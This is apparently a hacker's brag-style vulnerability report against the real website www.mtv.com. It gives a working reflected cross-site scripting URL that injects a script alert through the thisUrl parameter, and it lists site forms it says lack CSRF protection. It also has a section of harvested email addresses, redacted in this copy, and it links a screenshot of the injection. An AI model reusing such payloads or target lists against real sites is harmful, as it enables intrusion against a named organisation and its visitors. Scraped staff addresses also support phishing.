report4:mtv.com

1. **********************************************************************************************
2. Target: www.mtv.com
3.  
4. [**] XSS:
5.  
6. http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?footprintUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml&thisUrl=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20on%20MTV%20website%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E
7.  
8. "work only on mozila firefox"
9.  
10. [**] Cross-site Request Forgery:
11.  
12. Cross-site Request Forgery (CSRF) is a type of attack whereby unauthorized commands are transmitted from a user that the application trusts. Unlike Cross-site Scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
13.  
14. solution: Url and Forms that perform important operations must be protected by random tokens (hidden nonce values). These tokens must be checked for validity at the server before the request is processed.
15.  
16. url: http://www.mtv.com/artists/bridgit-mendler/
17.  
18. form: <form method="POST" action="http://www.mtv.com/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
19.  
20. url: http://www.mtv.com/mobile/
21.  
22. form: <form method="POST" action="http://www.mtv.com/mobile/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
23.  
24. url: http://www.mtv.com/mobile/faqs/
25.  
26. form: <form method="POST" action="http://www.mtv.com/mobile/faqs/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
27.  
28. url: http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?thisUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml&footprintUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml
29.  
30. form: <form method="POST" action="http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?thisUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Finde...
31.  
32.  
33. [**]Email Disclosure'
34.  
35.  
36. email: [email protected]
37.  
38. email: [email protected]
39.  
40. email: [email protected]
41.  
42. email: [email protected]
43.  
44. email: [email protected]
45.  
46. email: [email protected]
47.  
48. email: [email protected]
49.  
50. email: [email protected]
51.  
52. email: [email protected]
53.  
54. email: [email protected]
55.  
56. email: [email protected]
57.  
58. email: [email protected]
59.  
60. email: [email protected]
61.  
62. email: [email protected]
63.  
64. email: [email protected]
65.  
66. email: [email protected]
67.  
68. email: [email protected]
69.  
70. email: [email protected]
71.  
72. email: [email protected]
73.  
74. email: [email protected]
75.  
76. email: [email protected]
77.  
78. email: [email protected]
79.  
80. email: [email protected]
81.  
82. email: [email protected]
83.  
84. email: [email protected]
85.  
86. email: [email protected]
87.  
88. email: [email protected]
89.  
90. email: [email protected]
91.  
92. email: [email protected]
93.  
94. email: [email protected]
95.  
96. email: [email protected]
97.  
98. email: [email protected]
99.  
100. email: [email protected]
101.  
102.  
103. Picture of XSS vuln: http://www.imagup.com/data/1166124931.html
104.  
105. Human mind cracker